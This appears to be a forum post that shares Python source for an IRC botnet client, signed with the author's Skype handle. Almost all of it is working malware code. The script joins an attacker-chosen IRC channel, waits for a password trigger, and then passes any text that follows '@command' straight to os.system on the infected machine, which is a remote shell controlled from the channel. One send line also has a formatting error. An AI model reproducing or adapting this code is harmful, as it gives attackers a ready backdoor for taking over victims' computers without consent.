Botnet Python [Source] English

#!/usr/bin/env python # -*- coding: utf-8 -*- ############################################# # Source Botnet Python # # # # Skype: princesa.alice| # ############################################# import socket, os, time from re import search #Settings - ./Alice server = 'Server IRC' porta = 6667 #6667 standard Port. canal = 'Channel' nick = 'Name Bot' password = 'Password Bot' #socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, porta)) s.send('NICK %s\r\n' %nick) s.send('USER ' + nick + ' ' + nick + ' ' + nick + ' .:\n') s.send('Join %s\r\n' %canal) time.sleep(2) print (s.recv(1024)) #Checks what you type in the channel # If you enter "@connect + password", the status of the test variable passes True # If not the status of the variable remains False. teste = False while teste != True: msg = s.recv(5000) print (msg) if msg[0:4] == 'PING': s.send(msg.replace('PING', 'PONG')) if search('@online %s' %password, msg): teste = True s.send('PRIVMSG %s : successfully connected!\r\n' %canal) s.send('Botnet Created By Alice | | Skype: princesa.alice | Good Luck =)\r\n' %canal) # Type: "@command + Command" Ex: @command clear the bot clear terminal while True: msg = s.recv(5000) print (msg) if msg[0:4] == 'PING': s.send(msg.replace('PING', 'PONG')) if search('@command', msg): msg = msg.split('@command') msg = msg[1].split('\r\n') os.system(msg[0]) s.send('PRIVMSG %s : Command [ %s ] successfully executed!\r\n' %(canal, str(msg[0])))
Botnet Python [Source] English
Created + Translated To English By Alice
Skype: princesa.alice

Good Luck =)

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